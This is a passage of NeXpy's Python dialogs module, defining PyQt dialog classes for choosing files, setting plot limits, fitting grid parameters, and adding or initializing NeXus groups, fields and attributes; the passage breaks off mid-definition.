-*-\n\n#-----------------------------------------------------------------------------\n# Copyright (c) 2013, NeXpy Development Team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file COPYING, distributed with this software.\n#-----------------------------------------------------------------------------\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport six\n\nimport imp\nimport logging\nimport numbers\nimport os\nimport re\nimport sys\n\nfrom .pyqt import QtGui, QtCore, getOpenFileName\nimport pkg_resources\nimport numpy as np\nfrom scipy.optimize import minimize\n\ntry:\n from collections import OrderedDict\nexcept ImportError:\n from ordereddict import OrderedDict\n\nfrom nexusformat.nexus import (NeXusError, NXgroup, NXfield, NXattr,\n NXroot, NXentry, NXdata, NXparameters)\n\n\ndef wrap(text, length):\n words = text.split()\n lines = []\n line = ''\n for w in words:\n if len(w) + len(line) > length:\n lines.append(line)\n line = ''\n line = line + w + ' '\n if w is words[-1]: lines.append(line)\n return '\\n'.join(lines)\n\n\ndef natural_sort(key):\n import re\n return [int(t) if t.isdigit() else t for t in re.split(r'(\\d+)', key)] \n\n\nclass BaseDialog(QtGui.QDialog):\n \"\"\"Base dialog class for NeXpy dialogs\"\"\"\n \n def __init__(self, parent=None):\n\n self.accepted = False\n from .consoleapp import _mainwindow\n self.mainwindow = _mainwindow\n self.treeview = self.mainwindow.treeview\n self.default_directory = _mainwindow.default_directory\n self.import_file = None # must define in subclass\n self.nexus_filter = ';;'.join((\n \"NeXus Files (*.nxs *.nx5 *.h5 *.hdf *.hdf5)\",\n\t \"Any Files (*.* *)\"))\n\n if parent is None:\n parent = self.mainwindow\n super(BaseDialog, self).__init__(parent)\n\n def set_layout(self, *items):\n self.layout = QtGui.QVBoxLayout()\n for item in items:\n if isinstance(item, QtGui.QLayout):\n self.layout.addLayout(item)\n elif isinstance(item, QtGui.QWidget):\n self.layout.addWidget(item)\n self.setLayout(self.layout)\n\n def set_title(self, title):\n self.setWindowTitle(title)\n\n def close_buttons(self, save=False):\n \"\"\"\n Creates a box containing the standard Cancel and OK buttons.\n \"\"\"\n buttonbox = QtGui.QDialogButtonBox(self)\n buttonbox.setOrientation(QtCore.Qt.Horizontal)\n if save:\n buttonbox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|\n QtGui.QDialogButtonBox.Save)\n else:\n buttonbox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|\n QtGui.QDialogButtonBox.Ok)\n buttonbox.accepted.connect(self.accept)\n buttonbox.rejected.connect(self.reject)\n return buttonbox\n\n buttonbox = close_buttons #For backward compatibility\n\n def action_buttons(self, *items):\n layout = QtGui.QHBoxLayout()\n layout.addStretch()\n for label, action in items:\n button = QtGui.QPushButton(label)\n button.clicked.connect(action)\n layout.addWidget(button)\n layout.addStretch()\n return layout\n\n def filebox(self):\n \"\"\"\n Creates a text box and button for selecting a file.\n \"\"\"\n self.filebutton = QtGui.QPushButton(\"Choose File\")\n self.filebutton.clicked.connect(self.choose_file)\n self.filename = QtGui.QLineEdit(self)\n self.filename.setMinimumWidth(300)\n filebox = QtGui.QHBoxLayout()\n filebox.addWidget(self.filebutton)\n filebox.addWidget(self.filename)\n return filebox\n \n def directorybox(self, text=\"Choose Directory\"):\n \"\"\"\n Creates a text box and button for selecting a directory.\n \"\"\"\n self.directorybutton = QtGui.QPushButton(text)\n self.directorybutton.clicked.connect(self.choose_directory)\n self.directoryname = QtGui.QLineEdit(self)\n self.directoryname.setMinimumWidth(300)\n default = self.get_default_directory()\n if default:\n self.directoryname.setText(default)\n directorybox = QtGui.QHBoxLayout()\n directorybox.addWidget(self.directorybutton)\n directorybox.addWidget(self.directoryname)\n return directorybox\n\n def choose_file(self):\n \"\"\"\n Opens a file dialog and sets the file text box to the chosen path.\n \"\"\"\n dirname = self.get_default_directory(self.filename.text())\n filename = getOpenFileName(self, 'Open File', dirname)\n if os.path.exists(filename): # avoids problems if was selected\n dirname = os.path.dirname(filename)\n self.filename.setText(str(filename))\n self.set_default_directory(dirname)\n\n def get_filename(self):\n \"\"\"\n Returns the selected file.\n \"\"\"\n return self.filename.text()\n\n def choose_directory(self):\n \"\"\"\n Opens a file dialog and sets the directory text box to the chosen path.\n \"\"\"\n dirname = self.get_default_directory()\n dirname = QtGui.QFileDialog.getExistingDirectory(self, \n 'Choose Directory', \n dirname)\n if os.path.exists(dirname): # avoids problems if was selected\n self.directoryname.setText(str(dirname))\n self.set_default_directory(dirname)\n\n def get_directory(self):\n \"\"\"\n Returns the selected directory\n \"\"\"\n return self.directoryname.text()\n \n def get_default_directory(self, suggestion=None):\n '''return the most recent default directory for open/save dialogs'''\n if suggestion is None or not os.path.exists(suggestion):\n suggestion = self.default_directory\n if os.path.exists(suggestion):\n if not os.path.isdir(suggestion):\n suggestion = os.path.dirname(suggestion)\n suggestion = os.path.abspath(suggestion)\n return suggestion\n \n def set_default_directory(self, suggestion):\n '''define the default directory to use for open/save dialogs'''\n if os.path.exists(suggestion):\n if not os.path.isdir(suggestion):\n suggestion = os.path.dirname(suggestion)\n self.default_directory = suggestion\n\n def get_filesindirectory(self, prefix='', extension='.*', directory=None):\n \"\"\"\n Returns a list of files in the selected directory.\n \n The files are sorted using a natural sort algorithm that preserves the\n numeric order when a file name consists of text and index so that, e.g., \n 'data2.tif' comes before 'data10.tif'.\n \"\"\"\n if directory:\n os.chdir(directory)\n else:\n os.chdir(self.get_directory())\n if not extension.startswith('.'):\n extension = '.'+extension\n from glob import glob\n filenames = glob(prefix+'*'+extension)\n return sorted(filenames,key=natural_sort)\n\n def select_box(self, choices, default=None, slot=None):\n box = QtGui.QComboBox()\n box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n for choice in choices:\n box.addItem(choice)\n if default in choices:\n idx = box.findText(default)\n box.setCurrentIndex(idx)\n else:\n box.setCurrentIndex(0)\n if slot:\n box.currentIndexChanged.connect(slot)\n return box\n\n def select_root(self, slot=None, text='Select Root :', other=False):\n layout = QtGui.QHBoxLayout()\n box = QtGui.QComboBox()\n box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n roots = []\n for root in self.treeview.tree.NXroot:\n roots.append(root.nxname)\n for root in sorted(roots):\n box.addItem(root)\n if not other:\n try:\n node = self.treeview.get_node()\n idx = box.findText(node.nxroot.nxname)\n if idx >= 0:\n box.setCurrentIndex(idx)\n except Exception:\n box.setCurrentIndex(0)\n if slot:\n box.currentIndexChanged.connect(slot)\n layout.addWidget(QtGui.QLabel(text))\n layout.addWidget(box)\n layout.addStretch()\n if not other:\n self.root_box = box\n self.root_layout = layout\n else:\n self.other_root_box = box\n self.other_root_layout = layout\n return layout\n\n @property\n def root(self):\n return self.treeview.tree[self.root_box.currentText()]\n\n @property\n def other_root(self):\n return self.treeview.tree[self.other_root_box.currentText()]\n\n def select_entry(self, slot=None, text='Select Entry :', other=False):\n layout = QtGui.QHBoxLayout()\n box = QtGui.QComboBox()\n box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n entries = []\n for root in self.treeview.tree.NXroot:\n for entry in root.NXentry:\n entries.append(root.nxname+'/'+entry.nxname)\n for entry in sorted(entries):\n box.addItem(entry)\n if not other:\n try:\n node = self.treeview.get_node()\n idx = box.findText(node.nxroot.nxname+'/'+node.nxentry.nxname)\n if idx >= 0:\n box.setCurrentIndex(idx)\n except Exception:\n box.setCurrentIndex(0)\n if slot:\n box.currentIndexChanged.connect(slot)\n layout.addWidget(QtGui.QLabel(text))\n layout.addWidget(box)\n layout.addStretch()\n if not other:\n self.entry_box = box\n self.entry_layout = layout\n else:\n self.other_entry_box = box\n self.other_entry_layout = layout\n return layout\n\n @property\n def entry(self):\n return self.treeview.tree[self.entry_box.currentText()]\n\n @property\n def other_entry(self):\n return self.treeview.tree[self.other_entry_box.currentText()]\n\n def read_parameter(self, root, path):\n \"\"\"\n Read the value from the NeXus path.\n \n It will return 'None' if the path is not valid.\n \"\"\"\n try:\n value = root[path].nxdata\n if isinstance(value, np.ndarray) and value.size == 1:\n return np.float32(value)\n else:\n return value\n except NeXusError:\n return None \n\n def accept(self):\n \"\"\"\n Accepts the result.\n \n This usually needs to be subclassed in each dialog.\n \"\"\"\n self.accepted = True\n QtGui.QDialog.accept(self)\n \n def reject(self):\n \"\"\"\n Cancels the dialog without saving the result.\n \"\"\"\n self.accepted = False\n QtGui.QDialog.reject(self)\n\n def update_progress(self):\n \"\"\"\n Call the main QApplication.processEvents\n \n This ensures that GUI items like progress bars get updated\n \"\"\"\n self.mainwindow._app.processEvents()\n\n def progress_layout(self, save=False):\n layout = QtGui.QHBoxLayout()\n self.progress_bar = QtGui.QProgressBar()\n layout.addWidget(self.progress_bar)\n layout.addStretch()\n layout.addWidget(self.close_buttons(save))\n return layout\n\n def get_node(self):\n \"\"\"\n Return the node currently selected in the treeview\n \"\"\"\n return self.treeview.get_node()\n\n def confirm_action(self, query, information=None):\n msgBox = QtGui.QMessageBox()\n msgBox.setText(query)\n if information:\n msgBox.setInformativeText(information)\n msgBox.setStandardButtons(QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel)\n msgBox.setDefaultButton(QtGui.QMessageBox.Ok)\n return msgBox.exec_()\n\n\nclass GridParameters(OrderedDict):\n \"\"\"\n A dictionary of parameters to be entered in a dialog box grid.\n\n All keys must be strings, and valid Python symbol names, and all values\n must be of class GridParameter.\n \"\"\"\n def __init__(self, *args, **kwds):\n super(GridParameters, self).__init__(self)\n self.update(*args, **kwds)\n\n def __setitem__(self, key, value):\n if value is not None and not isinstance(value, GridParameter):\n raise ValueError(\"'%s' is not a GridParameter\" % value)\n OrderedDict.__setitem__(self, key, value)\n value.name = key\n\n def add(self, name, value=None, label=None, vary=None, slot=None,\n field=None):\n \"\"\"\n Convenience function for adding a Parameter:\n\n Example\n -------\n p = Parameters()\n p.add(name, value=XX, ...)\n\n is equivalent to:\n p[name] = Parameter(name=name, value=XX, ....\n \"\"\"\n self.__setitem__(name, GridParameter(value=value, name=name, label=label,\n vary=vary, slot=slot))\n\n def grid(self, header=True, title=None):\n grid = QtGui.QGridLayout()\n grid.setSpacing(10)\n header_font = QtGui.QFont()\n header_font.setBold(True)\n row = 0\n if title:\n title_label = QtGui.QLabel(title)\n title_label.setFont(header_font)\n title_label.setAlignment(QtCore.Qt.AlignHCenter)\n grid.addWidget(title_label, row, 0, 1, 2)\n row += 1\n if header:\n parameter_label = QtGui.QLabel('Parameter')\n parameter_label.setFont(header_font)\n parameter_label.setAlignment(QtCore.Qt.AlignHCenter)\n grid.addWidget(parameter_label, 0, 0)\n value_label = QtGui.QLabel('Value')\n value_label.setFont(header_font)\n value_label.setAlignment(QtCore.Qt.AlignHCenter)\n grid.addWidget(value_label, row, 1)\n row += 1\n vary = False\n for p in self.values():\n label, value, checkbox = p.label, p.value, p.vary\n grid.addWidget(p.label, row, 0)\n grid.addWidget(p.box, row, 1, QtCore.Qt.AlignHCenter)\n if checkbox is not None:\n grid.addWidget(p.checkbox, row, 2, QtCore.Qt.AlignHCenter)\n vary = True\n row += 1\n if vary:\n fit_label = QtGui.QLabel('Fit?')\n fit_label.setFont(header_font)\n grid.addWidget(fit_label, 0, 2, QtCore.Qt.AlignHCenter)\n self.grid_layout = grid\n return grid\n\n def set_parameters(self):\n self.parameters = []\n for p in self.values():\n p.init_value = p.value\n if p.vary:\n self.parameters.append({p.name:p.value})\n\n def get_parameters(self, p):\n i = 0\n for key in [list(x)[0] for x in self.parameters]:\n self[key].value = p[i]\n i += 1\n\n def refine_parameters(self, residuals, method='nelder-mead', **opts):\n self.set_parameters()\n p0 = np.array([list(p.values())[0] for p in self.parameters])\n result = minimize(residuals, p0, method='nelder-mead',\n options={'xtol': 1e-6, 'disp': True})\n self.get_parameters(result.x)\n\n def restore_parameters(self):\n for p in self.values():\n p.value = p.init_value\n\n def save(self):\n for p in self.values():\n p.save()\n\n\nclass GridParameter(object):\n \"\"\"\n A Parameter is an object to be set in a dialog box grid.\n \"\"\"\n def __init__(self, name=None, value=None, label=None, vary=None, slot=None):\n \"\"\"\n Parameters\n ----------\n name : str, optional\n Name of the parameter.\n value : float, optional\n Numerical Parameter value or NXfield containing the initial value\n label : str, optional\n Label used in the dialog box.\n vary : bool or None, optional\n Whether the Parameter is fixed during a fit. \n slot : function or None, optional\n Function to be called when the parameter is changed. \n \"\"\"\n self.name = name\n self._value = value\n if isinstance(value, list) or isinstance(value, tuple):\n self.box = QtGui.QComboBox()\n self.box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n for v in value:\n self.box.addItem(str(v))\n if slot is not None:\n self.box.currentIndexChanged.connect(slot)\n else:\n self.box = QtGui.QLineEdit()\n self.box.setAlignment(QtCore.Qt.AlignRight)\n if value is not None:\n if isinstance(value, NXfield):\n if value.shape == ():\n self.field = value\n self.value = self.field.nxdata\n else:\n raise NeXusError('Cannot set a grid parameter to an array')\n else:\n self.field = None\n self.value = value\n if slot is not None:\n self.box.editingFinished.connect(slot)\n if vary is not None:\n self.checkbox = QtGui.QCheckBox()\n self.vary = vary\n self.init_value = self.value\n else:\n self.checkbox = self.vary = self.init_value = None\n self.label = QtGui.QLabel(label)\n\n def set(self, value=None, vary=None):\n \"\"\"\n Set or update Parameter attributes.\n\n Parameters\n ----------\n value : float, optional\n Numerical Parameter value.\n vary : bool, optional\n Whether the Parameter is fixed during a fit.\n \"\"\"\n if value is not None:\n self._val = value\n if vary is not None:\n self.vary = vary\n\n def __repr__(self):\n s = []\n if self.name is not None:\n s.append(\"'%s'\" % self.name)\n sval = repr(self.value)\n s.append(sval)\n return \"\" % ', '.join(s)\n\n def save(self):\n if isinstance(self.field, NXfield):\n self.field.nxdata = np.array(self.value).astype(self.field.dtype)\n\n @property\n def value(self):\n if isinstance(self.box, QtGui.QComboBox):\n return self.box.currentText()\n else:\n _value = self.box.text()\n try:\n return np.asscalar(np.array(_value).astype(self.field.dtype))\n except AttributeError:\n try:\n return float(_value)\n except ValueError:\n return _value\n\n @value.setter\n def value(self, value):\n self._value = value\n if value is not None:\n if isinstance(self.box, QtGui.QComboBox):\n idx = self.box.findText(value)\n if idx >= 0:\n self.box.setCurrentIndex(idx)\n else:\n if isinstance(value, NXfield):\n value = value.nxdata\n if isinstance(value, six.text_type):\n self.box.setText(value)\n else:\n self.box.setText('%.6g' % value)\n\n @property\n def vary(self):\n if self.checkbox is not None:\n return self.checkbox.isChecked()\n else:\n return None\n\n @vary.setter\n def vary(self, value):\n if self.checkbox is not None:\n if value:\n self.checkbox.setCheckState(QtCore.Qt.Checked)\n else:\n self.checkbox.setCheckState(QtCore.Qt.Unchecked)\n\n\nclass PlotDialog(BaseDialog):\n \"\"\"Dialog to plot arbitrary NeXus data in one or two dimensions\"\"\"\n \n def __init__(self, node, parent=None, fmt='o'):\n\n super(PlotDialog, self).__init__(parent)\n \n if isinstance(node, NXfield):\n self.group = node.nxgroup\n signal_name = node.nxname\n else:\n self.group = node\n signal_name = None\n\n self.fmt = fmt\n\n self.signal_combo = QtGui.QComboBox() \n for node in self.group.values():\n if isinstance(node, NXfield) and node.is_plottable():\n self.signal_combo.addItem(node.nxname)\n if self.signal_combo.count() == 0:\n raise NeXusError(\"No plottable field in group\")\n self.signal_combo.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n if signal_name:\n idx = self.signal_combo.findText(signal_name)\n if idx >= 0:\n self.signal_combo.setCurrentIndex(idx)\n else:\n signal_name = None\n self.signal_combo.currentIndexChanged.connect(self.choose_signal)\n \n self.grid = QtGui.QGridLayout()\n self.grid.setSpacing(10)\n self.grid.addWidget(QtGui.QLabel('Signal :'), 0, 0)\n self.grid.addWidget(self.signal_combo, 0, 1)\n self.choose_signal()\n\n self.layout = QtGui.QVBoxLayout()\n self.layout.addLayout(self.grid)\n self.layout.addWidget(self.close_buttons())\n self.setLayout(self.layout)\n\n self.setWindowTitle(\"Plot NeXus Data\")\n\n @property\n def signal(self):\n return self.group[self.signal_combo.currentText()]\n\n @property\n def ndim(self):\n return self.signal.ndim\n\n def choose_signal(self):\n row = 0\n self.axis_boxes = {}\n for axis in range(self.ndim):\n row += 1\n self.grid.addWidget(QtGui.QLabel(\"Axis %s: \" % axis), row, 0)\n self.axis_boxes[axis] = self.axis_box(axis)\n self.grid.addWidget(self.axis_boxes[axis], row, 1)\n while row < self.grid.rowCount() - 1:\n self.remove_axis(row)\n row += 1 \n\n def axis_box(self, axis):\n box = QtGui.QComboBox()\n for node in self.group.values():\n if isinstance(node, NXfield) and node is not self.signal:\n if self.check_axis(node, axis):\n box.addItem(node.nxname)\n if box.count() > 0:\n box.insertSeparator(0)\n box.insertItem(0,'NXfield index')\n return box\n\n def remove_axis(self, axis):\n row = axis + 1\n for column in range(2):\n item = self.grid.itemAtPosition(row, column)\n if item is not None:\n widget = item.widget()\n if widget is not None:\n widget.setVisible(False)\n self.grid.removeWidget(widget)\n widget.deleteLater() \n\n def check_axis(self, node, axis):\n if isinstance(node, NXgroup) or node.ndim > 1:\n return False\n axis_len = self.signal.shape[axis]\n if node.ndim == 0:\n node_len = 1\n else:\n node_len = node.shape[0]\n if node_len == axis_len or node_len == axis_len+1:\n return True\n else:\n return False\n\n def get_axis(self, axis):\n axis_name = self.axis_boxes[axis].currentText()\n if axis_name == 'NXfield index':\n return NXfield(range(self.signal.shape[axis]), \n name='index_%s' % axis)\n else:\n return self.group[axis_name]\n\n def get_axes(self):\n return [self.get_axis(axis) for axis in range(self.ndim)]\n\n def accept(self):\n data = NXdata(self.signal, self.get_axes(), title=self.signal.nxtitle)\n data.plot(fmt=self.fmt)\n super(PlotDialog, self).accept()\n\n \nclass LimitDialog(BaseDialog):\n \"\"\"Dialog to set plot window limits\n \n This is useful when it is desired to set the limits outside the data limits. \n \"\"\"\n \n def __init__(self, parent=None):\n\n super(LimitDialog, self).__init__(parent)\n \n from .plotview import plotview\n\n self.plotview = plotview\n \n layout = QtGui.QVBoxLayout()\n\n xmin_layout = QtGui.QHBoxLayout()\n xmin_layout.addWidget(QtGui.QLabel('xmin'))\n self.xmin_box = self.textbox()\n self.xmin_box.setValue(plotview.xaxis.min)\n xmin_layout.addWidget(self.xmin_box)\n layout.addLayout(xmin_layout)\n\n xmax_layout = QtGui.QHBoxLayout()\n xmax_layout.addWidget(QtGui.QLabel('xmax'))\n self.xmax_box = self.textbox()\n self.xmax_box.setValue(plotview.xaxis.max)\n xmax_layout.addWidget(self.xmax_box)\n layout.addLayout(xmax_layout)\n\n ymin_layout = QtGui.QHBoxLayout()\n ymin_layout.addWidget(QtGui.QLabel('ymin'))\n self.ymin_box = self.textbox()\n self.ymin_box.setValue(plotview.yaxis.min)\n ymin_layout.addWidget(self.ymin_box)\n layout.addLayout(ymin_layout)\n\n ymax_layout = QtGui.QHBoxLayout()\n ymax_layout.addWidget(QtGui.QLabel('ymax'))\n self.ymax_box = self.textbox()\n self.ymax_box.setValue(plotview.yaxis.max)\n ymax_layout.addWidget(self.ymax_box)\n layout.addLayout(ymax_layout)\n\n if plotview.ndim > 1:\n vmin_layout = QtGui.QHBoxLayout()\n vmin_layout.addWidget(QtGui.QLabel('vmin'))\n self.vmin_box = self.textbox()\n self.vmin_box.setValue(plotview.vaxis.min)\n vmin_layout.addWidget(self.vmin_box)\n layout.addLayout(vmin_layout)\n\n vmax_layout = QtGui.QHBoxLayout()\n vmax_layout.addWidget(QtGui.QLabel('vmax'))\n self.vmax_box = self.textbox()\n self.vmax_box.setValue(plotview.vaxis.max)\n vmax_layout.addWidget(self.vmax_box)\n layout.addLayout(vmax_layout)\n\n layout.addWidget(self.close_buttons()) \n self.setLayout(layout)\n\n self.setWindowTitle(\"Limit axes\")\n\n def textbox(self):\n from .plotview import NXTextBox\n textbox = NXTextBox()\n textbox.setAlignment(QtCore.Qt.AlignRight)\n textbox.setFixedWidth(75)\n return textbox\n\n def accept(self):\n xmin, xmax = self.xmin_box.value(), self.xmax_box.value() \n ymin, ymax = self.ymin_box.value(), self.ymax_box.value()\n if self.plotview.ndim > 1:\n vmin, vmax = self.vmin_box.value(), self.vmax_box.value()\n self.plotview.autoscale = False\n self.plotview.set_plot_limits(xmin, xmax, ymin, ymax, vmin, vmax)\n else:\n self.plotview.set_plot_limits(xmin, xmax, ymin, ymax)\n super(LimitDialog, self).accept()\n\n \nclass AddDialog(BaseDialog):\n \"\"\"Dialog to add a NeXus node\"\"\"\n\n data_types = ['char', 'float32', 'float64', 'int8', 'uint8', 'int16', \n 'uint16', 'int32', 'uint32', 'int64', 'uint64']\n \n def __init__(self, node, parent=None):\n\n super(AddDialog, self).__init__(parent)\n\n self.node = node\n\n class_layout = QtGui.QHBoxLayout()\n self.class_box = QtGui.QComboBox()\n if isinstance(self.node, NXgroup):\n names = ['NXgroup', 'NXfield']\n else:\n names = ['NXattr']\n for name in names:\n self.class_box.addItem(name)\n self.class_button = QtGui.QPushButton(\"Add\")\n self.class_button.clicked.connect(self.select_class)\n class_layout.addWidget(self.class_box)\n class_layout.addWidget(self.class_button)\n class_layout.addStretch() \n\n if isinstance(self.node, NXfield):\n self.setWindowTitle(\"Add NeXus Attribute\")\n else:\n self.setWindowTitle(\"Add NeXus Data\")\n\n self.layout = QtGui.QVBoxLayout()\n self.layout.addLayout(class_layout)\n self.layout.addWidget(self.close_buttons()) \n self.setLayout(self.layout)\n\n def select_class(self):\n self.class_name = self.class_box.currentText()\n if self.class_name == \"NXgroup\":\n self.layout.insertLayout(1, self.define_grid(\"NXgroup\"))\n elif self.class_name == \"NXfield\":\n self.layout.insertLayout(1, self.define_grid(\"NXfield\"))\n else:\n self.layout.insertLayout(1, self.define_grid(\"NXattr\"))\n self.class_button.setDisabled(True)\n self.class_box.setDisabled(True)\n\n def define_grid(self, class_name):\n grid = QtGui.QGridLayout()\n grid.setSpacing(10)\n\n name_label = QtGui.QLabel()\n name_label.setAlignment(QtCore.Qt.AlignLeft)\n name_label.setText(\"Name:\")\n self.name_box = QtGui.QLineEdit()\n self.name_box.setAlignment(QtCore.Qt.AlignLeft)\n if class_name == \"NXgroup\":\n combo_label = QtGui.QLabel()\n combo_label.setAlignment(QtCore.Qt.AlignLeft)\n combo_label.setText(\"Group Class:\")\n self.combo_box = QtGui.QComboBox()\n self.combo_box.currentIndexChanged.connect(self.select_combo)\n from .consoleapp import _mainwindow\n standard_groups = sorted(list(set([g for g in \n _mainwindow.nxclasses[self.node.nxclass][2]])))\n for name in standard_groups:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[name][0], 40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.insertSeparator(self.combo_box.count())\n other_groups = sorted([g for g in _mainwindow.nxclasses if g not in\n standard_groups])\n for name in other_groups:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[name][0], 40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(combo_label, 0, 0)\n grid.addWidget(self.combo_box, 0, 1)\n grid.addWidget(name_label, 1, 0)\n grid.addWidget(self.name_box, 1, 1)\n elif class_name == \"NXfield\":\n combo_label = QtGui.QLabel()\n combo_label.setAlignment(QtCore.Qt.AlignLeft)\n self.combo_box = QtGui.QComboBox()\n self.combo_box.currentIndexChanged.connect(self.select_combo)\n from .consoleapp import _mainwindow\n fields = sorted(list(set([g for g in \n _mainwindow.nxclasses[self.node.nxclass][1]])))\n for name in fields:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[self.node.nxclass][1][name][2], 40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(name_label, 0, 0)\n grid.addWidget(self.name_box, 0, 1)\n grid.addWidget(self.combo_box, 0, 2)\n value_label = QtGui.QLabel()\n value_label.setAlignment(QtCore.Qt.AlignLeft)\n value_label.setText(\"Value:\")\n self.value_box = QtGui.QLineEdit()\n self.value_box.setAlignment(QtCore.Qt.AlignLeft)\n grid.addWidget(value_label, 1, 0)\n grid.addWidget(self.value_box, 1, 1)\n units_label = QtGui.QLabel()\n units_label.setAlignment(QtCore.Qt.AlignLeft)\n units_label.setText(\"Units:\")\n self.units_box = QtGui.QLineEdit()\n self.units_box.setAlignment(QtCore.Qt.AlignLeft)\n grid.addWidget(units_label, 2, 0)\n grid.addWidget(self.units_box, 2, 1)\n type_label = QtGui.QLabel()\n type_label.setAlignment(QtCore.Qt.AlignLeft)\n type_label.setText(\"Datatype:\")\n self.type_box = QtGui.QComboBox()\n for name in self.data_types:\n self.type_box.addItem(name)\n self.type_box.insertSeparator(0)\n self.type_box.insertItem(0, 'auto')\n self.type_box.setCurrentIndex(0)\n self.type_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(type_label, 3, 0)\n grid.addWidget(self.type_box, 3, 1)\n else:\n grid.addWidget(name_label, 0, 0)\n grid.addWidget(self.name_box, 0, 1)\n value_label = QtGui.QLabel()\n value_label.setAlignment(QtCore.Qt.AlignLeft)\n value_label.setText(\"Value:\")\n self.value_box = QtGui.QLineEdit()\n self.value_box.setAlignment(QtCore.Qt.AlignLeft)\n grid.addWidget(value_label, 1, 0)\n grid.addWidget(self.value_box, 1, 1)\n type_label = QtGui.QLabel()\n type_label.setAlignment(QtCore.Qt.AlignLeft)\n type_label.setText(\"Datatype:\")\n self.type_box = QtGui.QComboBox()\n for name in self.data_types:\n self.type_box.addItem(name)\n self.type_box.insertSeparator(0)\n self.type_box.insertItem(0, 'auto')\n self.type_box.setCurrentIndex(0)\n self.type_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(type_label, 2, 0)\n grid.addWidget(self.type_box, 2, 1)\n grid.setColumnMinimumWidth(1, 200)\n return grid\n\n def select_combo(self):\n self.set_name(self.combo_box.currentText())\n \n def get_name(self):\n return self.name_box.text()\n\n def set_name(self, name):\n if self.class_name == 'NXgroup':\n name = name[2:]\n self.name_box.setText(name)\n\n def get_value(self):\n value = self.value_box.text()\n if value:\n dtype = self.get_type()\n if dtype == \"char\":\n return value\n else:\n from .consoleapp import _shell\n try:\n return eval(value, {\"__builtins__\": {}}, _shell)\n except Exception:\n return str(value)\n else:\n return None\n\n def get_units(self):\n return self.units_box.text()\n\n def get_type(self):\n if self.class_name == 'NXgroup':\n return self.combo_box.currentText()\n else:\n dtype = self.type_box.currentText()\n if dtype == \"auto\":\n return None\n else:\n return dtype \n\n def accept(self):\n name = self.get_name()\n if self.class_name == \"NXgroup\":\n nxclass = self.get_type()\n if name:\n self.node[name] = NXgroup(nxclass=nxclass)\n else:\n self.node.insert(NXgroup(nxclass=nxclass))\n logging.info(\"'%s' added to '%s'\" \n % (self.node[name], self.node.nxpath)) \n elif name:\n value = self.get_value()\n dtype = self.get_type()\n if value is not None:\n if self.class_name == \"NXfield\":\n self.node[name] = NXfield(value, dtype=dtype)\n logging.info(\"'%s' added to '%s'\" \n % (name, self.node.nxpath)) \n units = self.get_units()\n if units:\n self.node[name].attrs['units'] = units\n else:\n self.node.attrs[name] = NXattr(value, dtype=dtype)\n logging.info(\"Attribute '%s' added to '%s'\" \n % (name, self.node.nxpath)) \n super(AddDialog, self).accept()\n\n \nclass InitializeDialog(BaseDialog):\n \"\"\"Dialog to initialize a NeXus field node\"\"\"\n\n data_types = ['char', 'float32', 'float64', 'int8', 'uint8', 'int16', \n 'uint16', 'int32', 'uint32', 'int64', 'uint64']\n \n def __init__(self, node, parent=None):\n\n super(InitializeDialog, self).__init__(parent)\n \n self.node = node\n\n self.setWindowTitle(\"Initialize NeXus Data\")\n\n grid = QtGui.QGridLayout()\n grid.setSpacing(10)\n\n name_label = QtGui.QLabel()\n name_label.setAlignment(QtCore.Qt.AlignLeft)\n name_label.setText(\"Name:\")\n self.name_box = QtGui.QLineEdit()\n self.name_box.setAlignment(QtCore.Qt.AlignLeft)\n self.combo_box = QtGui.QComboBox()\n self.combo_box.currentIndexChanged.connect(self.select_combo)\n from .consoleapp import _mainwindow\n fields = sorted(list(set([g for g in \n _mainwindow.nxclasses[self.node.nxclass][1]])))\n for name in fields:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[self.node.nxclass][1][name][2], 40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(name_label, 0, 0)\n grid.addWidget(self.name_box, 0, 1)\n grid.addWidget(self.combo_box, 0, 2)\n type_label = QtGui.QLabel()\n type_label.setAlignment(QtCore.Qt.AlignLeft)\n type_label.setText(\"Datatype:\")\n self.type_box = QtGui.QComboBox()\n for name in self.data_types:\n self.type_box.addItem(name)\n self.type_box.setCurrentIndex(0)\n self.type_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(type_label, 2, 0)\n grid.addWidget(self.type_box, 2, 1)\n shape_label = QtGui.QLabel()\n shape_label.setAlignment(QtCore.Qt.AlignLeft)\n shape_label.setText(\"Shape:\")\n self.shape_box = QtGui.QLineEdit()\n self.shape_box.setAlignment(QtCore.Qt.AlignLeft)\n grid.addWidget(shape_label, 3, 0)\n grid.addWidget(self.shape_box, 3, 1)\n grid.setColumnMinimumWidth(1, 200)\n\n self.layout = QtGui.QVBoxLayout()\n self.layout.addLayout(grid)\n self.layout.addWidget(self.close_buttons()) \n self.setLayout(self.layout)\n\n def select_combo(self):\n self.set_name(self.combo_box.currentText())\n \n def get_name(self):\n return self.name_box.text()\n\n def set_name(self, name):\n self.name_box.setText(name)\n\n def 